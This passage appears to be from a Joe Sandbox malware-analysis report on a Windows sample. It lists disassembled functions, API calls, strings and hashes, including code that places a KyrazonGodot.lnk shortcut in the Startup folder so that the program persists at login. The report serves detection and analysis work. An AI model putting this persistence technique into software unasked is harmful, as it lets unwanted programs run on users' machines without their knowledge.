                                                                                      • Associated: 0000000C.00000002.1923463426.000000000040C000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923494083.000000000040F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_400000_Shortcut.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharCreateInstanceMultiWide
                                                                                      • String ID: CoCreateInstance() returned [%d]$IPersistFile::Save() failed with [%i]$IPersistFile::SaveCompleted() failed with [%i]$IShellLink::QueryInterface() returned [%d]$IShellLink::SetArguments() failed with [%i]$IShellLink::SetDescription() failed with [%i]$IShellLink::SetHotkey() failed with [%i]$IShellLink::SetIconLocation() failed with [%i]$IShellLink::SetPath() failed with [%i]$IShellLink::SetShowCmd() failed with [%i]$IShellLink::SetWorkingDirectory() failed with [%i]$C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KyrazonGodot.lnk
                                                                                      • API String ID: 123533781-1328962457
                                                                                      • Opcode ID: 8a8901c6ce573155238bfe9ba605f3272a4ca4f40b13b7891484f1c13e31722e
                                                                                      • Instruction ID: 446fe51c5131944fafe0983fb7adff54cf9e32d93924186f7a6edebb0ffc769c
                                                                                      • Opcode Fuzzy Hash: 8a8901c6ce573155238bfe9ba605f3272a4ca4f40b13b7891484f1c13e31722e
                                                                                      • Instruction Fuzzy Hash: DF71D271B40222ABC610DB59DD89E9B77D4AF44B50F140179FA08FB3D0EAB8DC409BE9
                                                                                      Function 004041BB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 308 4041bb-4041c5 309 4041c7-4041d2 GetCurrentProcess TerminateProcess 308->309 310 4041d8-4041ee 308->310 309->310 311 4041f0-4041f7 310->311 312 40422c-404240 call 404254 310->312 313 4041f9-404205 311->313 314 40421b-40422b call 404254 311->314 323 404252-404253 312->323 324 404242-40424c ExitProcess 312->324 316 404207-40420b 313->316 317 40421a 313->317 314->312 320 40420d 316->320 321 40420f-404218 316->321 317->314 320->321 321->316 321->317
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32(+.@,?,004041A6,00000000,00000000,00000000,00402E2B,00000000), ref: 004041CB
                                                                                      • TerminateProcess.KERNEL32(00000000,?,004041A6,00000000,00000000,00000000,00402E2B,00000000), ref: 004041D2
                                                                                      • ExitProcess.KERNEL32 ref: 0040424C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1923375563.0000000000401000.00000020.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000C.00000002.1923358705.0000000000400000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923396555.0000000000408000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923418046.0000000000409000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923444056.000000000040A000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923463426.000000000040C000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923494083.000000000040F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_400000_Shortcut.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                      • String ID: +.@
                                                                                      • API String ID: 1703294689-3061987503
                                                                                      • Opcode ID: 2d429d929ea8a0b317f002e275b952974cda3d528bdaf8c8f98ac53763413882
                                                                                      • Instruction ID: 5536314daef21801047468bbd332fe2a45d2b29d39cfc402778ff2b632d0f2f8
                                                                                      • Opcode Fuzzy Hash: 2d429d929ea8a0b317f002e275b952974cda3d528bdaf8c8f98ac53763413882
                                                                                      • Instruction Fuzzy Hash: 5D0184B2744201DAD6106B95FFC4A5A7BA5FBD4390B10407FF650721E0CB789888CA1D
                                                                                      Function 00403401 Relevance: 3.6, APIs: 2, Instructions: 623COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1923375563.0000000000401000.00000020.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000C.00000002.1923358705.0000000000400000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923396555.0000000000408000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923418046.0000000000409000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923444056.000000000040A000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923463426.000000000040C000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923494083.000000000040F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_400000_Shortcut.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 89c0238259bda3cfb8336a94d97ebaaa58a9a963f60f6fc3d6d598877c13e167
                                                                                      • Instruction ID: 3d60e96441c5061d7fe8783f23e6a381593ab39bf64455fbaf2fe5d712ed1a1c
                                                                                      • Opcode Fuzzy Hash: 89c0238259bda3cfb8336a94d97ebaaa58a9a963f60f6fc3d6d598877c13e167
                                                                                      • Instruction Fuzzy Hash: 893292B1D04249AADF24CFA8C5487AEBFB8AF0431AF14807BD851B62D1D77C9B41CB59
                                                                                      Function 00404B4A Relevance: 3.0, APIs: 2, Instructions: 30memoryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 575 404b4a-404b68 HeapCreate 576 404ba0-404ba2 575->576 577 404b6a-404b77 call 404a02 575->577 580 404b86-404b89 577->580 581 404b79-404b84 call 405f68 577->581 582 404ba3-404ba6 580->582 583 404b8b call 4067b9 580->583 587 404b90-404b92 581->587 583->587 587->582 588 404b94-404b9a HeapDestroy 587->588 588->576
                                                                                      APIs
                                                                                      • HeapCreate.KERNELBASE(00000000,00001000,00000000,00402DC9,00000000), ref: 00404B5B
                                                                                        • Part of subcall function 00404A02: GetVersionExA.KERNEL32 ref: 00404A21
                                                                                      • HeapDestroy.KERNEL32 ref: 00404B9A
                                                                                        • Part of subcall function 00405F68: HeapAlloc.KERNEL32(00000000,00000140,00404B83,000003F8), ref: 00405F75
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1923375563.0000000000401000.00000020.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000C.00000002.1923358705.0000000000400000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923396555.0000000000408000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923418046.0000000000409000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923444056.000000000040A000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923463426.000000000040C000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923494083.000000000040F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_400000_Shortcut.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$AllocCreateDestroyVersion
                                                                                      • String ID:
                                                                                      • API String ID: 2507506473-0
                                                                                      • Opcode ID: 17fc14b2b0ee490da2abc08a22e18cba9d5a41ab53b1d009843be57efd4fbba3
                                                                                      • Instruction ID: c37ba0b62e725718b283f0108c969a86dae0ba7a96d42cb4502cdc696fecd27d
                                                                                      • Opcode Fuzzy Hash: 17fc14b2b0ee490da2abc08a22e18cba9d5a41ab53b1d009843be57efd4fbba3
                                                                                      • Instruction Fuzzy Hash: 82F09BB0A4530159EF206B70AE4672A36E4DB80795F20043FF745F81D0EF7CD494950D
                                                                                      Function 0040508B Relevance: 1.5, APIs: 1, Instructions: 46memoryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 589 40508b-405098 590 40509a-4050a0 589->590 591 4050af-4050b2 589->591 592 4050e1-4050e3 590->592 594 4050a2-4050ab call 406304 590->594 591->592 593 4050b4-4050ba 591->593 597 4050e5-4050e7 592->597 598 4050e8-4050eb 592->598 595 4050c4-4050c6 593->595 596 4050bc-4050c2 593->596 594->592 603 4050ad-4050ae 594->603 600 4050c7-4050cd 595->600 596->600 597->598 601 4050ee-4050f7 RtlAllocateHeap 598->601 600->601 604 4050cf-4050dd call 406ab1 600->604 605 4050fd-4050fe 601->605 604->605 608 4050df 604->608 608->601
                                                                                      APIs
                                                                                      • RtlAllocateHeap.NTDLL(00000000,?,?,0040506F,000000E0,0040505C,?,0040483B,00000100), ref: 004050F7
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1923375563.0000000000401000.00000020.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000C.00000002.1923358705.0000000000400000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923396555.0000000000408000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923418046.0000000000409000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923444056.000000000040A000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923463426.000000000040C000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923494083.000000000040F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_400000_Shortcut.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocateHeap
                                                                                      • String ID:
                                                                                      • API String ID: 1279760036-0
                                                                                      • Opcode ID: dd3db8fef11c01220ba402cd8664f8f9f55ff54d20bcd4e0f61341d511754d65
                                                                                      • Instruction ID: 5bc31aa35ac4668d3eeac07d16caf22c06a3e39f42864eaa2c0d9096b0519aee
                                                                                      • Opcode Fuzzy Hash: dd3db8fef11c01220ba402cd8664f8f9f55ff54d20bcd4e0f61341d511754d65
                                                                                      • Instruction Fuzzy Hash: CFF081329159209BEA306714AD8079F6754EB01720F264137FC91FB2D1CA78AC958ECD

                                                                                      Non-executed Functions

                                                                                      Function 00406DDD Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 50libraryloaderCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 820 406ddd-406de8 821 406dea-406df9 LoadLibraryA 820->821 822 406e2c-406e33 820->822 825 406e62-406e64 821->825 826 406dfb-406e10 GetProcAddress 821->826 823 406e35-406e3b 822->823 824 406e4b-406e57 822->824 823->824 830 406e3d-406e44 823->830 827 406e5e-406e61 824->827 825->827 826->825 828 406e12-406e27 GetProcAddress * 2 826->828 828->822 830->824 831 406e46-406e49 830->831 831->824
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00404ED5,?,Microsoft Visual C++ Runtime Library,00012010,?,004084A4,?,004084F4,?,?,?,Runtime Error!Program: ), ref: 00406DEF
                                                                                      • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00406E07
                                                                                      • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00406E18
                                                                                      • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00406E25
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1923375563.0000000000401000.00000020.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000C.00000002.1923358705.0000000000400000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923396555.0000000000408000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923418046.0000000000409000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923444056.000000000040A000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923463426.000000000040C000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923494083.000000000040F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_400000_Shortcut.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc$LibraryLoad
                                                                                      • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                                                                      • API String ID: 2238633743-4044615076
                                                                                      • Opcode ID: e9e1d29084c3a61837c38555e13bb237a6bf8ab80c030ff43d0d697c62a3a1bb
                                                                                      • Instruction ID: da1cee133eb1f0aac0d6a5eb0433271fd4e1a8b91bcea41f29a9dc06e3078c45
                                                                                      • Opcode Fuzzy Hash: e9e1d29084c3a61837c38555e13bb237a6bf8ab80c030ff43d0d697c62a3a1bb
                                                                                      • Instruction Fuzzy Hash: 12012535A00311AFC711AFF5DE84A1B3ED99758790315443AB641F6291DEB8C8159BA8
                                                                                      Function 00402420 Relevance: 23.1, APIs: 6, Strings: 7, Instructions: 381comCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 707 402420-40251d CoCreateInstance 708 40252d-40252f 707->708 709 40251f-40252a call 4029c7 707->709 710 402535-402551 708->710 711 4028cc-4028d6 708->711 709->708 715 402561-402563 710->715 716 402553-40255e call 4029c7 710->716 718 4028b3-4028bf 715->718 719 402569-4025a4 MultiByteToWideChar 715->719 716->715 718->711 723 4028c1-4028cb 718->723 724 4025b4-4025b7 719->724 725 4025a6-4025b1 call 4029c7 719->725 726 4028a8-4028b2 724->726 727 4025bd-4025d4 724->727 725->724 726->718 732 4025e4-4025e6 727->732 733 4025d6-4025e1 call 4029c7 727->733 732->726 735 4025ec-402616 732->735 733->732 738 402626-40262e 735->738 739 402618-402623 call 4029c7 735->739 741 402630-402670 ExpandEnvironmentStringsA 738->741 742 402699-4026b2 738->742 739->738 741->742 744 402672-402697 741->744 746 4026b4-4026f4 ExpandEnvironmentStringsA 742->746 747 40271d-402733 742->747 744->742 746->747 748 4026f6-40271b 746->748 750 402735-40276f ExpandEnvironmentStringsA 747->750 751 402798-4027a9 747->751 748->747 750->751 752 402771-402796 750->752 754 4027b4-4027d2 751->754 755 4027ab-4027af 751->755 752->751 757 4027d4-40281d ExpandEnvironmentStringsA 754->757 758 402846-402857 754->758 755->754 757->758 759 40281f-402844 757->759 761 402864-40287f 758->761 762 402859-40285e 758->762 759->758 761->726 764 402881-4028a6 761->764 762->761 764->726
                                                                                      APIs
                                                                                      • CoCreateInstance.OLE32(00408150,00000000,00000001,00408140,?), ref: 0040250E
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KyrazonGodot.lnk,000000FF,?,00000105), ref: 00402581
                                                                                      • ExpandEnvironmentStringsA.KERNEL32(?,?,00000105), ref: 0040266C
                                                                                      • ExpandEnvironmentStringsA.KERNEL32(?,?,00000105), ref: 004026F0
                                                                                      • ExpandEnvironmentStringsA.KERNEL32(?,?,00000105), ref: 0040276B
                                                                                      • ExpandEnvironmentStringsA.KERNEL32(?,?,00000105), ref: 00402819
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KyrazonGodot.lnk, xrefs: 0040242D, 00402578
                                                                                      • IShellLink::QueryInterface() returned [%d], xrefs: 00402554
                                                                                      • IShellLink::GetPath() returned [%d], xrefs: 00402619
                                                                                      • CoCreateInstance() returned [%d], xrefs: 00402520
                                                                                      • IShellLink::Resolve() returned [%d], xrefs: 004025D7
                                                                                      • C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe, xrefs: 00402652
                                                                                      • IPersistFile::Load() returned [%d], xrefs: 004025A7
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1923375563.0000000000401000.00000020.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000C.00000002.1923358705.0000000000400000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923396555.0000000000408000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923418046.0000000000409000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923444056.000000000040A000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923463426.000000000040C000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923494083.000000000040F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_400000_Shortcut.jbxd
                                                                                      Similarity
                                                                                      • API ID: EnvironmentExpandStrings$ByteCharCreateInstanceMultiWide
                                                                                      • String ID: CoCreateInstance() returned [%d]$IPersistFile::Load() returned [%d]$IShellLink::GetPath() returned [%d]$IShellLink::QueryInterface() returned [%d]$IShellLink::Resolve() returned [%d]$C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KyrazonGodot.lnk
                                                                                      • API String ID: 4107729762-4106024972
                                                                                      • Opcode ID: f826fa4fd362661552adaaf908bd862360ec36d41562970343b84b974c2fccca
                                                                                      • Instruction ID: 65386ca67d88dcf44c49e41ca9b6a6bce6168fe9bd534fa320ee539b649c66a9
                                                                                      • Opcode Fuzzy Hash: f826fa4fd362661552adaaf908bd862360ec36d41562970343b84b974c2fccca
                                                                                      • Instruction Fuzzy Hash: 5DD1E2713047459FD724CA38C995BABB7D6AFC4310F044A2DB689E72D0DBF89908CB5A
                                                                                      Function 00401FA0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 179keyboardCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 765 401fa0-401faa 766 401fb0-401fcf 765->766 767 402137-40215d 765->767 768 401fe0-401fe7 766->768 769 401fd1-401fdd call 4029c7 766->769 771 401fe9-402037 MapVirtualKeyA GetKeyNameTextA 768->771 772 40203b-40203e 768->772 769->768 771->772 774 402040-40208e MapVirtualKeyA GetKeyNameTextA 772->774 775 402092-402095 772->775 774->775 776 402097-4020e5 MapVirtualKeyA GetKeyNameTextA 775->776 777 4020e9-4020f7 MapVirtualKeyA 775->777 776->777 778 402117-402136 GetKeyNameTextA 777->778 779 4020f9-402106 777->779 779->778 780 402108-402114 call 4029c7 779->780 780->778
                                                                                      APIs
                                                                                      • MapVirtualKeyA.USER32(00000011,00000000), ref: 00401FFD
                                                                                      • GetKeyNameTextA.USER32(00000000), ref: 00402007
                                                                                      • MapVirtualKeyA.USER32(00000010,00000000), ref: 00402054
                                                                                      • GetKeyNameTextA.USER32(00000000), ref: 0040205E
                                                                                      • MapVirtualKeyA.USER32(00000012,00000000), ref: 004020AB
                                                                                      • GetKeyNameTextA.USER32(00000000), ref: 004020B5
                                                                                      • MapVirtualKeyA.USER32(00000000,00000000), ref: 004020EC
                                                                                      • GetKeyNameTextA.USER32(00000000,?,00000032), ref: 0040212C
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KyrazonGodot.lnk, xrefs: 00401FA9
                                                                                      • KeyCode: [%i], Modifiers: [%i], xrefs: 00401FD3, 0040210A
                                                                                      • None, xrefs: 00402137
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1923375563.0000000000401000.00000020.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000C.00000002.1923358705.0000000000400000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923396555.0000000000408000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923418046.0000000000409000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923444056.000000000040A000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923463426.000000000040C000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923494083.000000000040F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_400000_Shortcut.jbxd
                                                                                      Similarity
                                                                                      • API ID: NameTextVirtual
                                                                                      • String ID: KeyCode: [%i], Modifiers: [%i]$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KyrazonGodot.lnk$None
                                                                                      • API String ID: 3859213288-287706817
                                                                                      • Opcode ID: 09507b448c0862c6a2d22d5221e48fd681c2dedeec79cf164cd9edd5305f7d49
                                                                                      • Instruction ID: c2ee2aa202e0e2dde0b4862d6f1f15111f6179d6d6b0666bd2a409d611d544fe
                                                                                      • Opcode Fuzzy Hash: 09507b448c0862c6a2d22d5221e48fd681c2dedeec79cf164cd9edd5305f7d49
                                                                                      • Instruction Fuzzy Hash: 0341E8317505181BE7184A386D1A77B7A86EBC0770F19033EFA67A72D2DEB98D05825C
                                                                                      Function 004046F8 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 132COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 783 4046f8-404711 784 404713-404719 GetEnvironmentStringsW 783->784 785 404746-404749 783->785 786 404727-404731 GetEnvironmentStrings 784->786 787 40471b-404725 784->787 788 4047d0-4047d3 785->788 789 40474f-404751 785->789 790 404821 786->790 791 404737-404741 786->791 787->789 788->790 792 4047d5-4047d7 788->792 793 404753-404759 GetEnvironmentStringsW 789->793 794 40475f-404764 789->794 797 404823-404829 790->797 791->792 798 4047e5-4047e9 792->798 799 4047d9-4047e3 GetEnvironmentStrings 792->799 793->790 793->794 795 404774-404791 WideCharToMultiByte 794->795 796 404766-40476b 794->796 803 404793-4047a0 call 40504d 795->803 804 4047c5-4047ce FreeEnvironmentStringsW 795->804 796->796 802 40476d-404772 796->802 800 4047f5-404805 call 40504d 798->800 801 4047eb-4047ee 798->801 799->790 799->798 810 404807-404809 800->810 811 40480b-404813 call 405880 800->811 801->801 805 4047f0-4047f3 801->805 802->795 802->796 803->804 812 4047a2-4047b1 WideCharToMultiByte 803->812 804->797 805->800 805->801 813 404816-40481f FreeEnvironmentStringsA 810->813 811->813 815 4047c1 812->815 816 4047b3-4047bd call 405232 812->816 813->797 815->804 816->815
                                                                                      APIs
                                                                                      • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,00402DEF), ref: 00404713
                                                                                      • GetEnvironmentStrings.KERNEL32(?,?,?,?,?,?,00402DEF), ref: 00404727
                                                                                      • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,00402DEF), ref: 00404753
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00402DEF), ref: 0040478B
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00402DEF), ref: 004047AD
                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,?,00402DEF), ref: 004047C6
                                                                                      • GetEnvironmentStrings.KERNEL32(?,?,?,?,?,?,00402DEF), ref: 004047D9
                                                                                      • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00404817
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1923375563.0000000000401000.00000020.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000C.00000002.1923358705.0000000000400000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923396555.0000000000408000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923418046.0000000000409000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923444056.000000000040A000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923463426.000000000040C000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923494083.000000000040F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_400000_Shortcut.jbxd
                                                                                      Similarity
                                                                                      • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                                                      • String ID: -@
                                                                                      • API String ID: 1823725401-2999422947
                                                                                      • Opcode ID: 1d4ece172509871e54c057335d218c222eaa59bdd30da85cc5f206ca0d2cf4c4
                                                                                      • Instruction ID: 0fa67cdf29e181a3b6a8eebca1ea6ebb3e3a07ea2e708aa514b911421c2da062
                                                                                      • Opcode Fuzzy Hash: 1d4ece172509871e54c057335d218c222eaa59bdd30da85cc5f206ca0d2cf4c4
                                                                                      • Instruction Fuzzy Hash: 9931F4F38042506FD7207BB55E8883BB69CE6C6358711093FF791F3281EB398C4586A9
                                                                                      Function 00403E8D Relevance: 13.7, APIs: 9, Instructions: 177COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 833 403e8d-403ebb 834 403f03-403f06 833->834 835 403ebd-403ed7 LCMapStringW 833->835 838 403f18-403f20 834->838 839 403f08-403f15 call 4040b1 834->839 836 403ee1-403ef3 LCMapStringA 835->836 837 403ed9-403edf 835->837 840 403ef9 836->840 841 40401b 836->841 837->834 843 403f22-403f3a LCMapStringA 838->843 844 403f3f-403f42 838->844 839->838 840->834 846 40401d-40402e 841->846 843->846 844->841 847 403f48-403f4b 844->847 848 403f55-403f79 MultiByteToWideChar 847->848 849 403f4d-403f52 847->849 848->841 850 403f7f-403fb3 call 405760 848->850 849->848 850->841 854 403fb5-403fcc MultiByteToWideChar 850->854 854->841 855 403fce-403fe7 LCMapStringW 854->855 855->841 856 403fe9-403fed 855->856 857 40402f-404065 call 405760 856->857 858 403fef-403ff2 856->858 857->841 865 404067-40407d LCMapStringW 857->865 859 403ff8-403ffb 858->859 860 4040aa-4040ac 858->860 859->841 862 403ffd-404015 LCMapStringW 859->862 860->846 862->841 862->860 865->841 866 40407f-404084 865->866 867 404086-404088 866->867 868 40408a-40408d 866->868 869 404090-4040a4 WideCharToMultiByte 867->869 868->869 869->841 869->860
                                                                                      APIs
                                                                                      • LCMapStringW.KERNEL32(00000000,00000100,004081F4,00000001,00000000,00000000,00000103,00000001,?,?,00405CFC,00200020,00000000,?,?,00000000), ref: 00403ECF
                                                                                      • LCMapStringA.KERNEL32(00000000,00000100,004081F0,00000001,00000000,00000000,?,00405CFC,00200020,00000000,?,?,00000000,00000001), ref: 00403EEB
                                                                                      • LCMapStringA.KERNEL32(?,?,00000000,00200020,00405CFC,?,00000103,00000001,?,?,00405CFC,00200020,00000000,?,?,00000000), ref: 00403F34
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000002,00000000,00200020,00000000,00000000,00000103,00000001,?,?,00405CFC,00200020,00000000,?,?,00000000), ref: 00403F6C
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,00405CFC,00200020,00000000), ref: 00403FC4
                                                                                      • LCMapStringW.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,00405CFC,00200020,00000000), ref: 00403FDA
                                                                                      • LCMapStringW.KERNEL32(?,?,00405CFC,00000000,00405CFC,?,?,00405CFC,00200020,00000000), ref: 0040400D
                                                                                      • LCMapStringW.KERNEL32(?,?,?,?,?,00000000,?,00405CFC,00200020,00000000), ref: 00404075
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1923375563.0000000000401000.00000020.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000C.00000002.1923358705.0000000000400000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923396555.0000000000408000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923418046.0000000000409000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923444056.000000000040A000.00000008.00000001.01000000.00000012.sdmpDownload File
